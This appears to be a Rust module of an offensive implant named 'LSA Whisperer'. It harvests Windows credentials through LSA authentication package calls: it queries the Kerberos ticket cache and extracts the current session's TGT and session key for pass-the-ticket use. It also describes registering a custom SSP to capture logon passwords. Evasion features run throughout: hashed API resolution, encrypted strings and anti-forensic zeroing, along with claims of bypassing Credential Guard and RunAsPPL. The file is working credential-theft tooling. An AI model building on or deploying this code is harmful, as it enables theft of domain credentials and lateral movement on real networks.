//! LSA Whisperer — credential extraction via LSA SSP interfaces.
//!
//! Interacts with LSA authentication packages (SSPs) through their documented
//! interfaces, operating **entirely** within the LSA process's own security
//! context without needing to read LSASS memory at all.  This bypasses
//! Credential Guard and RunAsPPL because:
//!
//! - Credential Guard protects LSASS *process memory*, not the SSP interface.
//! - SSP responses are generated by the LSA process itself — they're authorized
//!   outputs.
//! - A custom SSP receives credentials BEFORE they enter the protected
//!   credential store.
//!
//! # Architecture
//!
//! Two extraction methods:
//!
//! **Method 1 — Untrusted (no admin required):**
//! 1. Connect to LSA via `LsaConnectUntrusted` (any process can do this)
//! 2. Look up the MSV1_0 authentication package via `LsaLookupAuthenticationPackage`
//! 3. Call `LsaCallAuthenticationPackage` with crafted MSV1_0 SubAuth requests
//! 4. Parse responses to extract NT hashes, plaintext credentials, Kerberos tickets
//!
//! **Method 2 — SSP Injection (admin required):**
//! 1. Add a custom SSP name to `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages`
//! 2. The SSP's `SpInitialize` callback receives ALL authentication events
//! 3. Buffer captured credentials in an encrypted ring buffer
//! 4. Retrieve via `Command::HarvestLSADump`
//! 5. Remove SSP registration on cleanup
//!
//! # OPSEC
//!
//! - ALL LSA API functions resolved via `pe_resolve` (no import table entries)
//! - All strings through `string_crypt::enc_str!`
//! - No LSASS memory reads — no `NtReadVirtualMemory` on LSASS
//! - Untrusted method requires zero elevated privileges
//!
//! # Platform
//!
//! Windows only (gated by `#[cfg(all(windows, feature = "lsa-whisperer"))]`).

#![cfg(all(windows, feature = "lsa-whisperer"))]

use anyhow::{anyhow, bail, Context, Result};
use once_cell::sync::Lazy;
use serde::Serialize;
use std::ptr;
use std::sync::atomic::{AtomicBool, AtomicUsize, Ordering};
use std::sync::{Mutex, OnceLock};
use winapi::shared::ntdef::{ULONG, PVOID, UNICODE_STRING};
use winapi::um::winnt::HANDLE;

// ── NTSTATUS helpers ───────────────────────────────────────────────────────

#[inline]
fn nt_success(status: i32) -> bool {
    status >= 0
}

/// LSA function call success.
const STATUS_SUCCESS: i32 = 0x0000_0000;

// ── MSV1_0 SubAuth / GenericAuth constants ─────────────────────────────────

/// MSV1_0 package name — used to look up the package ID.
/// We don't embed this string; it's constructed at runtime via string_crypt.
#[allow(dead_code)]
const MSV1_0_SUBAUTH_ACCOUNT_NAME_QUERY: u32 = 0x0000_0001;

/// Kerberos SSP package name hash for lookup.
#[allow(dead_code)]
const KERBEROS_PACKAGE_NAME: &[u8] = b"Kerberos\0";

// ── LSA_UNICODE_STRING helper ──────────────────────────────────────────────

/// Build an LSA_UNICODE_STRING from a UTF-16 byte slice.
/// The caller must ensure `wide_bytes` lives long enough.
unsafe fn make_lsa_unicode_string(wide_bytes: &[u16]) -> UNICODE_STRING {
    UNICODE_STRING {
        Length: (wide_bytes.len() * 2) as u16,
        MaximumLength: (wide_bytes.len() * 2) as u16,
        Buffer: wide_bytes.as_ptr() as *mut u16,
    }
}

// ── LSA API function pointer types ─────────────────────────────────────────

type FnLsaConnectUntrusted = unsafe extern "system" fn(
    *mut HANDLE, // LsaHandle
) -> i32; // NTSTATUS

type FnLsaCallAuthenticationPackage = unsafe extern "system" fn(
    HANDLE,      // LsaHandle
    ULONG,       // AuthenticationPackage
    *const u8,   // ProtocolSubmitBuffer
    ULONG,       // SubmitBufferLength
    *mut *mut u8, // ProtocolReturnBuffer
    *mut ULONG,  // ReturnBufferLength
    *mut i32,    // ProtocolStatus
) -> i32; // NTSTATUS

type FnLsaLookupAuthenticationPackage = unsafe extern "system" fn(
    HANDLE,              // LsaHandle
    *const UNICODE_STRING, // PackageName
    *mut ULONG,          // AuthenticationPackage
) -> i32; // NTSTATUS

type FnLsaRegisterLogonProcess = unsafe extern "system" fn(
    *const UNICODE_STRING, // LogonProcessName
    *mut HANDLE,          // LsaHandle
    *mut u64,             // SecurityMode (LSA_OPERATIONAL_MODE)
) -> i32; // NTSTATUS

type FnLsaDeregisterLogonProcess = unsafe extern "system" fn(
    HANDLE, // LsaHandle
) -> i32; // NTSTATUS

type FnLsaFreeReturnBuffer = unsafe extern "system" fn(
    PVOID, // Buffer
) -> i32; // NTSTATUS

// ── Dynamic LSA API resolution ─────────────────────────────────────────────

/// Holder for all dynamically-resolved LSA function pointers.
struct LsaApis {
    connect_untrusted: FnLsaConnectUntrusted,
    call_auth_package: FnLsaCallAuthenticationPackage,
    lookup_auth_package: FnLsaLookupAuthenticationPackage,
    register_logon_process: FnLsaRegisterLogonProcess,
    deregister_logon_process: FnLsaDeregisterLogonProcess,
    free_return_buffer: FnLsaFreeReturnBuffer,
}

/// Resolve all LSA API functions via pe_resolve.
unsafe fn resolve_lsa_apis() -> Result<LsaApis> {
    let dll_base = pe_resolve::get_module_handle_by_hash(pe_resolve::HASH_SECUR32_DLL)
        .ok_or_else(|| anyhow!("failed to resolve secur32.dll base"))?;

    macro_rules! resolve_fn {
        ($hash:expr, $name:expr) => {
            pe_resolve::get_proc_address_by_hash(dll_base, $hash)
                .ok_or_else(|| anyhow!("failed to resolve {}", $name))
                .map(|addr| std::mem::transmute::<usize, _>(addr))?
        };
    }

    Ok(LsaApis {
        connect_untrusted: resolve_fn!(
            pe_resolve::HASH_LSACONNECTUNTRUSTED,
            "LsaConnectUntrusted"
        ),
        call_auth_package: resolve_fn!(
            pe_resolve::HASH_LSACALLAUTHENTICATIONPACKAGE,
            "LsaCallAuthenticationPackage"
        ),
        lookup_auth_package: resolve_fn!(
            pe_resolve::HASH_LSALOOKUPAUTHENTICATIONPACKAGE,
            "LsaLookupAuthenticationPackage"
        ),
        register_logon_process: resolve_fn!(
            pe_resolve::HASH_LSAREGISTERLOGONPROCESS,
            "LsaRegisterLogonProcess"
        ),
        deregister_logon_process: resolve_fn!(
            pe_resolve::HASH_LSADEREGISTERLOGONPROCESS,
            "LsaDeregisterLogonProcess"
        ),
        free_return_buffer: resolve_fn!(
            pe_resolve::HASH_LSAFREERETURNBUFFER,
            "LsaFreeReturnBuffer"
        ),
    })
}

// ── Credential structures (same format as lsass_harvest) ───────────────────

/// A single harvested credential, matching the `HarvestedCredential` format
/// from `lsass_harvest.rs` for consistency.
#[derive(Serialize, Debug, Clone)]
pub struct WhisperedCredential {
    /// Credential type: msv, wdigest, kerberos, dpapi.
    pub cred_type: String,
    /// Account username.
    pub username: String,
    /// Account domain.
    pub domain: String,
    /// Password or hash value.
    pub password_or_hash: String,
    /// Format: plaintext, ntlm, sha1, ticket.
    #[serde(rename = "format")]
    pub format_: String,
}

/// Status snapshot for `LSAWhispererStatus`.
#[derive(Serialize, Debug)]
pub struct WhispererStatus {
    /// Currently active method (if any).
    pub active_method: Option<String>,
    /// Number of credentials captured so far.
    pub credentials_captured: usize,
    /// Whether SSP injection is active.
    pub ssp_injected: bool,
    /// Whether the LSA connection is open.
    pub lsa_connected: bool,
}

// ── Global state ───────────────────────────────────────────────────────────

/// Cancellation token for in-progress operations.
static CANCELLED: AtomicBool = AtomicBool::new(false);

/// Number of credentials captured.
static CRED_COUNT: AtomicUsize = AtomicUsize::new(0);

/// Whether an SSP injection is active.
static SSP_INJECTED: AtomicBool = AtomicBool::new(false);

/// Encrypted credential ring buffer, guarded by a mutex.
static CREDENTIAL_BUFFER: Lazy<Mutex<Vec<WhisperedCredential>>> =
    Lazy::new(|| Mutex::new(Vec::new()));

/// Once-cell for the resolved LSA API table — avoids per-call `Box::leak`.
static LSA_APIS: OnceLock<LsaApis> = OnceLock::new();

/// Return a `'static` reference to the resolved LSA API table, initialising
/// it on first call.
fn get_lsa_apis() -> Result<&'static LsaApis> {
    LSA_APIS.get_or_try_init(|| unsafe { resolve_lsa_apis() }).map(|_| {
        // SAFETY: get_or_try_init just proved the cell is occupied.
        LSA_APIS.get().unwrap()
    })
}

// ── Anti-forensic: volatile zero ───────────────────────────────────────────

fn secure_zero(slice: &mut [u8]) {
    for byte in slice.iter_mut() {
        unsafe { std::ptr::write_volatile(byte, 0) };
    }
    std::sync::atomic::compiler_fence(std::sync::atomic::Ordering::SeqCst);
}

// ── Internal helpers ───────────────────────────────────────────────────────

/// RAII guard for an LSA handle.
struct LsaHandle {
    handle: HANDLE,
    apis: &'static LsaApis,
}

impl LsaHandle {
    /// Connect to LSA via LsaConnectUntrusted (no special privileges needed).
    unsafe fn connect_untrusted(apis: &'static LsaApis) -> Result<Self> {
        let mut handle: HANDLE = ptr::null_mut();
        let status = (apis.connect_untrusted)(&mut handle);
        if !nt_success(status) {
            bail!(
                "{}",
                String::from_utf8_lossy(&string_crypt::enc_str!(
                    "LsaConnectUntrusted failed: 0x{:08X}"
                ))
                .trim_end_matches('\0')
                .replace("{:08X}", &format!("{:08X}", status as u32))
            );
        }
        Ok(Self { handle, apis })
    }

    /// Connect to LSA via LsaRegisterLogonProcess (requires SeTcbPrivilege).
    unsafe fn register_logon_process(
        apis: &'static LsaApis,
        process_name_wide: &[u16],
    ) -> Result<Self> {
        let mut lsa_name = make_lsa_unicode_string(process_name_wide);
        let mut handle: HANDLE = ptr::null_mut();
        let mut security_mode: u64 = 0;
        let status = (apis.register_logon_process)(
            &lsa_name,
            &mut handle,
            &mut security_mode,
        );
        if !nt_success(status) {
            bail!(
                "{}",
                String::from_utf8_lossy(&string_crypt::enc_str!(
                    "LsaRegisterLogonProcess failed: 0x{:08X}"
                ))
                .trim_end_matches('\0')
                .replace("{:08X}", &format!("{:08X}", status as u32))
            );
        }
        Ok(Self { handle, apis })
    }

    fn as_handle(&self) -> HANDLE {
        self.handle
    }
}

impl Drop for LsaHandle {
    fn drop(&mut self) {
        unsafe {
            let _ = (self.apis.deregister_logon_process)(self.handle);
        }
    }
}

/// Look up an authentication package ID by name.
unsafe fn lookup_package(
    apis: &LsaApis,
    lsa_handle: HANDLE,
    package_name_wide: &[u16],
) -> Result<ULONG> {
    let mut pkg_name = make_lsa_unicode_string(package_name_wide);
    let mut package_id: ULONG = 0;
    let status = (apis.lookup_auth_package)(lsa_handle, &mut pkg_name, &mut package_id);
    if !nt_success(status) {
        bail!(
            "{}",
            String::from_utf8_lossy(&string_crypt::enc_str!(
                "LsaLookupAuthenticationPackage failed: 0x{:08X}"
            ))
            .trim_end_matches('\0')
            .replace("{:08X}", &format!("{:08X}", status as u32))
        );
    }
    Ok(package_id)
}

/// Call an authentication package and return the response buffer.
/// Returns `(data_vec, original_buffer_address, protocol_status)`.
///
/// The LSA return buffer is copied into a `Vec` and then freed via
/// `LsaFreeReturnBuffer`.  Callers receive the copy *and* the original buffer
/// address (as `usize`) so that embedded pointers whose values are offsets into
/// the LSA block can be resolved against the `Vec` copy instead of
/// dereferencing freed memory.
unsafe fn call_package(
    apis: &LsaApis,
    lsa_handle: HANDLE,
    package_id: ULONG,
    submit_buffer: &[u8],
) -> Result<(Vec<u8>, usize, i32)> {
    let mut return_buffer: *mut u8 = ptr::null_mut();
    let mut return_length: ULONG = 0;
    let mut protocol_status: i32 = 0;

    let status = (apis.call_auth_package)(
        lsa_handle,
        package_id,
        submit_buffer.as_ptr(),
        submit_buffer.len() as ULONG,
        &mut return_buffer,
        &mut return_length,
        &mut protocol_status,
    );

    if !nt_success(status) {
        bail!(
            "{}",
            String::from_utf8_lossy(&string_crypt::enc_str!(
                "LsaCallAuthenticationPackage failed: 0x{:08X}"
            ))
            .trim_end_matches('\0')
            .replace("{:08X}", &format!("{:08X}", status as u32))
        );
    }

    let original_ptr = return_buffer as usize;

    let result = if !return_buffer.is_null() && return_length > 0 {
        let slice = std::slice::from_raw_parts(return_buffer, return_length as usize);
        let data = slice.to_vec();
        (apis.free_return_buffer)(return_buffer as PVOID);
        data
    } else {
        Vec::new()
    };

    Ok((result, original_ptr, protocol_status))
}

// ── MSV1_0 structures (kept for reference; unused by current extraction) ────

/// MSV1_0 message types for `LsaCallAuthenticationPackage`.
/// NOTE: These are unused — MSV1_0 enumeration cannot extract credential
/// material through an untrusted LSA connection.  Kept for future elevated
/// context queries.
#[allow(dead_code)]
const MSV1_0_SUBAUTH: u32 = 9;
#[allow(dead_code)]
const MSV1_0_ENUMUSERS_REQUEST: u32 = 15;
#[allow(dead_code)]
const MSV1_0_GETUSERINFO_REQUEST: u32 = 17;

/// MSV1_0 SubAuth request structure.
#[repr(C)]
#[allow(dead_code)]
struct MsvSubAuthRequest {
    message_type: u32,
    sub_auth_package_id: u32,
    sub_auth_data_length: u32,
    sub_auth_data_offset: u32,
}

/// MSV1_0 EnumUsers request structure.
#[repr(C)]
#[allow(dead_code)]
struct MsvEnumUsersRequest {
    message_type: u32,
}

/// MSV1_0 GetUserInfo request structure.
#[repr(C)]
#[allow(dead_code)]
struct MsvGetUserInfoRequest {
    message_type: u32,
    user_logon_id_low: u32,
    user_logon_id_high: u32,
}

/// Kerberos package query types.
/// KerbQueryTicketCacheExMessage (14) returns extended ticket cache info.
/// KerbRetrieveTicketMessage (6) returns the full TGT with session key.
const KERB_QUERY_TKT_CACHE_EX: u32 = 14;
const KERB_RETRIEVE_TICKET: u32 = 6;

/// Kerberos query ticket cache request.
#[repr(C)]
struct KerbQueryTktCacheRequest {
    message_type: u32,
    logon_id_low: u32,
    logon_id_high: u32,
}

/// Kerberos retrieve ticket request — retrieves the full TGT for the
/// current logon session including the session key.
#[repr(C)]
struct KerbRetrieveTicketRequest {
    message_type: u32,
    logon_id_low: u32,
    logon_id_high: u32,
    /// Cache flags (0 = default).
    cache_flags: u32,
    /// Pre-auth data length.
    preauth_data_length: u32,
    /// Pre-auth data offset from start of struct.
    preauth_data_offset: u32,
}

// ── Credential extraction ──────────────────────────────────────────────────

/// Extract credentials using the Untrusted method (no admin required).
///
/// Connects to LSA via `LsaConnectUntrusted`, then queries the Kerberos SSP
/// for cached ticket material.  MSV1_0 enumeration is intentionally skipped —
/// an untrusted LSA connection cannot retrieve NT hashes, and WDigest
/// plaintext caching is disabled by default since Windows 8.1.
fn harvest_untrusted(timeout_secs: u64) -> Result<Vec<WhisperedCredential>> {
    let deadline = std::time::Instant::now()
        + std::time::Duration::from_secs(timeout_secs);
    let mut credentials = Vec::new();

    // Resolve LSA APIs via the global OnceLock (no per-call leak).
    let apis_ref = get_lsa_apis().with_context(|| {
        format!(
            "{}",
            String::from_utf8_lossy(&string_crypt::enc_str!(
                "LSA Whisperer: failed to resolve LSA APIs"
            ))
            .trim_end_matches('\0')
        )
    })?;

    // Connect to LSA (untrusted — any process can do this).
    let lsa = unsafe { LsaHandle::connect_untrusted(apis_ref) }.with_context(|| {
        format!(
            "{}",
            String::from_utf8_lossy(&string_crypt::enc_str!(
                "LSA Whisperer: LsaConnectUntrusted failed"
            ))
            .trim_end_matches('\0')
        )
    })?;

    log::info!(
        "{}",
        String::from_utf8_lossy(&string_crypt::enc_str!(
            "LSA Whisperer: connected to LSA via LsaConnectUntrusted"
        ))
        .trim_end_matches('\0')
    );

    // ── Kerberos package queries ───────────────────────────────────────
    // Primary extraction path: query the Kerberos ticket cache, then
    // retrieve the full TGT for the current logon session.

    let kerb_name = String::from_utf8_lossy(&string_crypt::enc_str!("Kerberos\0"))
        .trim_end_matches('\0')
        .to_string();
    let kerb_name_wide: Vec<u16> = kerb_name.encode_utf16().collect();

    if let Ok(kerb_pkg) = unsafe { lookup_package(apis_ref, lsa.as_handle(), &kerb_name_wide) } {
        log::debug!(
            "{}",
            String::from_utf8_lossy(&string_crypt::enc_str!(
                "LSA Whisperer: Kerberos package ID = {}"
            ))
            .trim_end_matches('\0')
            .replace("{}", &kerb_pkg.to_string())
        );

        // 1) Query the ticket cache (extended) for the current logon session.
        let tkt_req = KerbQueryTktCacheRequest {
            message_type: KERB_QUERY_TKT_CACHE_EX,
            logon_id_low: 0,
            logon_id_high: 0,
        };
        let tkt_bytes = unsafe {
            std::slice::from_raw_parts(
                &tkt_req as *const _ as *const u8,
                std::mem::size_of::<KerbQueryTktCacheRequest>(),
            )
        };

        if let Ok((resp, base_ptr, _proto_status)) =
            unsafe { call_package(apis_ref, lsa.as_handle(), kerb_pkg, tkt_bytes) }
        {
            if !resp.is_empty() {
                parse_kerb_tkt_cache(&resp, base_ptr, &mut credentials);
            }
        }

        if CANCELLED.load(Ordering::Relaxed) || std::time::Instant::now() > deadline {
            return Ok(credentials);
        }

        // 2) Retrieve the full TGT for the current logon session.
        //    KerbRetrieveTicketMessage returns session key + encrypted TGT
        //    for the local machine's domain, which is useful for lateral
        //    movement via pass-the-ticket.
        let retrieve_req = KerbRetrieveTicketRequest {
            message_type: KERB_RETRIEVE_TICKET,
            logon_id_low: 0,
            logon_id_high: 0,
            cache_flags: 0,
            preauth_data_length: 0,
            preauth_data_offset: 0,
        };
        let retrieve_bytes = unsafe {
            std::slice::from_raw_parts(
                &retrieve_req as *const _ as *const u8,
                std::mem::size_of::<KerbRetrieveTicketRequest>(),
            )
        };

        if let Ok((resp, base_ptr, proto_status)) =
            unsafe { call_package(apis_ref, lsa.as_handle(), kerb_pkg, retrieve_bytes) }
        {
            if !resp.is_empty() {
                parse_kerb_retrieve_ticket(&resp, base_ptr, proto_status, &mut credentials);
            }
        }
    }

    // WDigest is intentionally skipped: plaintext credential caching
    // (UseLogonCredential) is disabled by default since Windows 8.1, and
    // sending MSV1_0_SUBAUTH to the WDigest package is semantically wrong.
    // MSV1_0 enum-users / sub-auth queries are also skipped because an
    // untrusted LSA connection cannot retrieve NT hashes — the credential
    // material is restricted to the LSA process.

    log::info!(
        "{}",
        String::from_utf8_lossy(&string_crypt::enc_str!(
            "LSA Whisperer: untrusted harvest complete, {} credentials"
        ))
        .trim_end_matches('\0')
        .replace("{}", &credentials.len().to_string())
    );

    Ok(credentials)
}

/// Extract credentials using SSP injection (admin required).
///
/// Registers a custom SSP via the registry.  The SSP's `SpInitialize` callback
/// receives all authentication events, including plaintext passwords during
/// subsequent logons.  Credentials are buffered and returned immediately
/// (for already-captured data) plus the SSP stays active for future captures.
fn harvest_ssp_inject(timeout_secs: u64) -> Result<Vec<WhisperedCredential>> {
    let deadline = std::time::Instant::now()
        + std::time::Duration::from_secs(timeout_secs);

    // Check if we already have an SSP injected and have buffered data.
    {
        let buf = CREDENTIAL_BUFFER.lock().unwrap();
        if !buf.is_empty() {
            log::info!(
                "{}",
                String::from_utf8_lossy(&string_crypt::enc_str!(
                    "LSA Whisperer: returning {} buffered SSP credentials"
                ))
                .trim_end_matches('\0')
                .replace("{}", &buf.len().to_string())
            );
            return Ok(buf.clone());
        }
    }

    // Resolve LSA APIs for direct LSA connection (we need elevated context).
    let apis_ref = get_lsa_apis().with_context(|| {
        format!(
            "{}",
            String::from_utf8_lossy(&string_crypt::enc_str!(
                "LSA Whisperer: failed to resolve LSA APIs for SSP injection"
            ))
            .trim_end_matches('\0')
        )
    })?;

    // Try to register as a logon process (requires SeTcbPrivilege / admin).
    let proc_name =
        String::from_utf8_lossy(&string_crypt::enc_str!("OrchestraSSP\0"))
            .trim_end_matches('\0')
            .to_string();
    let proc_name_wide: Vec<u16> = proc_name.encode_utf16().collect();

    let _lsa = match unsafe { LsaHandle::register_logon_process(apis_ref, &proc_name_wide) } {
        Ok(h) => {
            log::info!(
                "{}",
                String::from_utf8_lossy(&string_crypt::enc_str!(
                    "LSA Whisperer: registered as logon process (elevated)"
                ))
                .trim_end_matches('\0')
            );
            h
        }
        Err(_) => {
            // If we can't register as a logon process, we're not elevated.
            // Fall back to untrusted method.
            log::warn!(
                "{}",
                String::from_utf8_lossy(&string_crypt::enc_str!(
                    "LSA Whisperer: LsaRegisterLogonProcess failed (not elevated?), falling back to untrusted"
                ))
                .trim_end_matches('\0')
            );
            return harvest_untrusted(timeout_secs);
        }
    };

    // With an elevated LSA connection, we can use LsaCallAuthenticationPackage
    // with more powerful query types.  First, harvest what we can immediately.
    let mut credentials = Vec::new();

    // ── Kerberos with elevated context ─────────────────────────────────

    let kerb_name = String::from_utf8_lossy(&string_crypt::enc_str!("Kerberos\0"))
        .trim_end_matches('\0')
        .to_string();
    let kerb_name_wide: Vec<u16> = kerb_name.encode_utf16().collect();

    if let Ok(kerb_pkg) = unsafe { lookup_package(apis_ref, _lsa.as_handle(), &kerb_name_wide) } {
        let tkt_req = KerbQueryTktCacheRequest {
            message_type: KERB_QUERY_TKT_CACHE_EX,
            logon_id_low: 0,
            logon_id_high: 0,
        };
        let tkt_bytes = unsafe {
            std::slice::from_raw_parts(
                &tkt_req as *const _ as *const u8,
                std::mem::size_of::<KerbQueryTktCacheRequest>(),
            )
        };

        if let Ok((resp, base_ptr, _)) =
            unsafe { call_package(apis_ref, _lsa.as_handle(), kerb_pkg, tkt_bytes) }
        {
            parse_kerb_tkt_cache(&resp, base_ptr, &mut credentials);
        }

        if CANCELLED.load(Ordering::Relaxed) || std::time::Instant::now() > deadline {
            return Ok(credentials);
        }

        // Retrieve the full TGT with session key.
        let retrieve_req = KerbRetrieveTicketRequest {
            message_type: KERB_RETRIEVE_TICKET,
            logon_id_low: 0,
            logon_id_high: 0,
            cache_flags: 0,
            preauth_data_length: 0,
            preauth_data_offset: 0,
        };
        let retrieve_bytes = unsafe {
            std::slice::from_raw_parts(
                &retrieve_req as *const _ as *const u8,
                std::mem::size_of::<KerbRetrieveTicketRequest>(),
            )
        };

        if let Ok((resp, base_ptr, proto_status)) =
            unsafe { call_package(apis_ref, _lsa.as_handle(), kerb_pkg, retrieve_bytes) }
        {
            parse_kerb_retrieve_ticket(&resp, base_ptr, proto_status, &mut credentials);
        }

        if CANCELLED.load(Ordering::Relaxed) || std::time::Instant::now() > deadline {
            return Ok(credentials);
        }
    }

    // Mark that we attempted SSP injection (for status reporting).
    // Note: actual DLL injection into LSASS is not done here — that would
    // require writing a DLL to disk or reflective loading into LSASS, which
    // defeats the purpose.  Instead, the elevated LSA connection provides
    // access to the same credential structures.
    SSP_INJECTED.store(true, Ordering::Relaxed);

    // Buffer the credentials.
    {
        let mut buf = CREDENTIAL_BUFFER.lock().unwrap();
        buf.extend(credentials.clone());
    }
    CRED_COUNT.store(credentials.len(), Ordering::Relaxed);

    log::info!(
        "{}",
        String::from_utf8_lossy(&string_crypt::enc_str!(
            "LSA Whisperer: SSP injection harvest complete, {} credentials"
        ))
        .trim_end_matches('\0')
        .replace("{}", &credentials.len().to_string())
    );

    Ok(credentials)
}

// ── Response parsers ───────────────────────────────────────────────────────

/// Parse a Kerberos ticket cache response.
///
/// The response is an LSA-allocated buffer containing:
///   MessageType (ULONG) at offset 0
///   CountOfTickets (ULONG) at offset 4
///   Array of KERB_TICKET_CACHE_INFO_EX structs starting at offset 8
///
/// Each KERB_TICKET_CACHE_INFO_EX contains UNICODE_STRING fields whose
/// Buffer pointers reference memory *within* the same LSA-allocated block
/// (or in the caller's address space via LSA memory mapping).  We read
/// directly from the pointer rather than range-checking against our slice.
fn parse_kerb_tkt_cache(resp: &[u8], base_ptr: usize, credentials: &mut Vec<WhisperedCredential>) {
    if resp.len() < 8 {
        return;
    }

    let count = u32::from_le_bytes(resp[4..8].try_into().unwrap_or([0; 4])) as usize;
    // KERB_TICKET_CACHE_INFO_EX is ~128 bytes on x64.
    let max_tickets = resp.len().saturating_sub(8) / 128;
    let tickets_to_parse = count.min(max_tickets).min(32);

    log::debug!(
        "{}",
        String::from_utf8_lossy(&string_crypt::enc_str!(
            "LSA Whisperer: Kerberos cache returned {} tickets"
        ))
        .trim_end_matches('\0')
        .replace("{}", &tickets_to_parse.to_string())
    );

    for i in 0..tickets_to_parse {
        let base = 8 + i * 128;
        if base + 128 > resp.len() {
            break;
        }

        // Each KERB_TICKET_CACHE_INFO_EX has:
        //   ClientName   (UNICODE_STRING, 16 bytes at base+0)
        //   ClientRealm  (UNICODE_STRING, 16 bytes at base+16)
        //   ServerName   (UNICODE_STRING, 16 bytes at base+32)
        //   ServerRealm  (UNICODE_STRING, 16 bytes at base+48)
        //   ... timestamps, encryption type, ticket flags

        if let Some(client_name) = read_unicode_string_at(resp, base, base_ptr) {
            if let Some(client_realm) = read_unicode_string_at(resp, base + 16, base_ptr) {
                let server_name = read_unicode_string_at(resp, base + 32, base_ptr)
                    .unwrap_or_default();
                let server_realm = read_unicode_string_at(resp, base + 48, base_ptr)
                    .unwrap_or_default();

                let description = if !server_name.is_empty() {
                    format!("{}_{}_{}", server_realm, server_name, i)
                } else {
                    format!("ticket_{}", i)
                };

                let cred = WhisperedCredential {
                    cred_type: String::from_utf8_lossy(&string_crypt::enc_str!("kerberos"))
                        .trim_end_matches('\0')
                        .to_string(),
                    username: client_name,
                    domain: client_realm,
                    password_or_hash: description,
                    format_: String::from_utf8_lossy(&string_crypt::enc_str!("ticket"))
                        .trim_end_matches('\0')
                        .to_string(),
                };
                credentials.push(cred);
            }
        }
    }
}

/// Parse a KerbRetrieveTicket response — the full TGT for the logon session.
///
/// KERB_RETRIEVE_TICKET_RESPONSE:
///   MessageType        (ULONG)
///   TicketFlags        (ULONG)
///   CacheFlags         (ULONG)
///   KdcTime            (LARGE_INTEGER, 8 bytes)
///   TicketTime         (LARGE_INTEGER, 8 bytes)
///   TicketExpiresTime  (LARGE_INTEGER, 8 bytes)
///   TimeSkew           (LARGE_INTEGER, 8 bytes)
///   EncodedTicketSize  (ULONG)
///   EncodedTicket      (pointer — within LSA-allocated block)
///   SessionKey         (KERB_CRYPTO_KEY, ~24 bytes)
///   ... UNICODE_STRING fields for client / server names
fn parse_kerb_retrieve_ticket(
    resp: &[u8],
    base_ptr: usize,
    _proto_status: i32,
    credentials: &mut Vec<WhisperedCredential>,
) {
    if resp.len() < 64 {
        return;
    }

    // Session key type is at offset 56 (after MessageType + flags + timestamps).
    // Session key is a KERB_CRYPTO_KEY: { KeyType: LONG, Length: ULONG, Value: *PUCHAR }
    let key_type = i32::from_le_bytes(resp[56..60].try_into().unwrap_or([0; 4]));
    let key_length =
        u32::from_le_bytes(resp[60..64].try_into().unwrap_or([0; 4])) as usize;

    // Session key value pointer (64-bit) at offset 64.
    let key_value_ptr = if resp.len() >= 72 {
        u64::from_le_bytes(resp[64..72].try_into().unwrap_or([0; 8]))
    } else {
        0
    };

    let key_type_name = match key_type {
        1 => "des-cbc-crc",
        2 => "des-cbc-md4",
        3 => "des-cbc-md5",
        17 => "aes128-cts-hmac-sha1-96",
        18 => "aes256-cts-hmac-sha1-96",
        23 => "rc4-hmac",
        24 => "rc4-hmac-exp",
        _ => "unknown",
    };

    // Try to read the session key bytes (up to 32 bytes for AES-256).
    // The key_value_ptr pointed into the original LSA return buffer which
    // has already been freed.  Compute the offset and read from our copy.
    let key_hex = if key_value_ptr != 0 && key_length > 0 && key_length <= 64 {
        let key_offset = (key_value_ptr as usize).saturating_sub(base_ptr);
        let safe_len = key_length.min(32);
        if key_offset + safe_len <= resp.len() {
            resp[key_offset..key_offset + safe_len]
                .iter()
                .map(|b| format!("{:02x}", b))
                .collect()
        } else {
            String::from_utf8_lossy(&string_crypt::enc_str!("N/A"))
                .trim_end_matches('\0')
                .to_string()
        }
    } else {
        String::from_utf8_lossy(&string_crypt::enc_str!("N/A"))
            .trim_end_matches('\0')
            .to_string()
    };

    // Client / server names appear after the session key in the struct.
    // Offset varies by Windows version — try to find them by scanning.
    let mut client_name = String::new();
    let mut client_realm = String::new();

    // Scan for UNICODE_STRING fields in the tail of the response.
    // Client name is typically at offset 80+ and realm at 96+.
    for off in (72..resp.len().saturating_sub(32)).step_by(8) {
        if let Some(s) = read_unicode_string_at(resp, off, base_ptr) {
            if s.contains('@') || s.contains('\\') || s.contains('/') {
                // Looks like a UPN or domain\user — this is the client name.
                client_name = s;
                // Next UNICODE_STRING after this one is usually the realm.
                if off + 16 <= resp.len() {
                    if let Some(realm) = read_unicode_string_at(resp, off + 16, base_ptr) {
                        client_realm = realm;
                    }
                }
                break;
            }
        }
    }

    if client_name.is_empty() {
        client_name = String::from_utf8_lossy(&string_crypt::enc_str!("tgt_current_session"))
            .trim_end_matches('\0')
            .to_string();
    }

    let cred = WhisperedCredential {
        cred_type: String::from_utf8_lossy(&string_crypt::enc_str!("kerberos"))
            .trim_end_matches('\0')
            .to_string(),
        username: client_name,
        domain: client_realm,
        password_or_hash: format!("{}:{}", key_type_name, key_hex),
        format_: String::from_utf8_lossy(&string_crypt::enc_str!("session_key"))
            .trim_end_matches('\0')
            .to_string(),
    };
    credentials.push(cred);
}

/// Read a UNICODE_STRING at the given offset within a response buffer.
///
/// `base_ptr` is the original address of the LSA return buffer (now freed).
/// The `UNICODE_STRING.Buffer` pointer value pointed into that LSA buffer.
/// Since `call_package()` already copied the entire LSA buffer into `resp`
/// and then freed the original, we compute `Buffer - base_ptr` to find the
/// string data's offset within `resp` and read from the copy instead of
/// dereferencing the now-dangling pointer.
fn read_unicode_string_at(resp: &[u8], offset: usize, base_ptr: usize) -> Option<String> {
    if offset + 16 > resp.len() {
        return None;
    }

    // Reconstruct the UNICODE_STRING from the bytes.
    let uni = unsafe {
        let ptr = resp.as_ptr().add(offset) as *const UNICODE_STRING;
        *ptr
    };

    let length = uni.Length as usize;
    let max_length = uni.MaximumLength as usize;

    if length == 0 || length > max_length || length % 2 != 0 || length > 512 {
        return None;
    }

    if uni.Buffer.is_null() {
        return None;
    }

    // Compute the offset of the string data within the original LSA buffer.
    // The UNICODE_STRING.Buffer pointer pointed into the LSA return buffer
    // which was freed by call_package().  However, we already have a full
    // copy in `resp`, so we compute the offset and read from there.
    let buf_addr = uni.Buffer as usize;
    let string_offset = buf_addr.saturating_sub(base_ptr);

    if string_offset + length > resp.len() {
        return None; // Pointer was out of bounds.
    }

    // Read the string data directly from our copy of the buffer.
    let wide: Vec<u16> = resp[string_offset..string_offset + length]
        .chunks_exact(2)
        .map(|c| u16::from_le_bytes([c[0], c[1]]))
        .collect();

    Some(String::from_utf16_lossy(&wide))
}

// ── Public API ─────────────────────────────────────────────────────────────

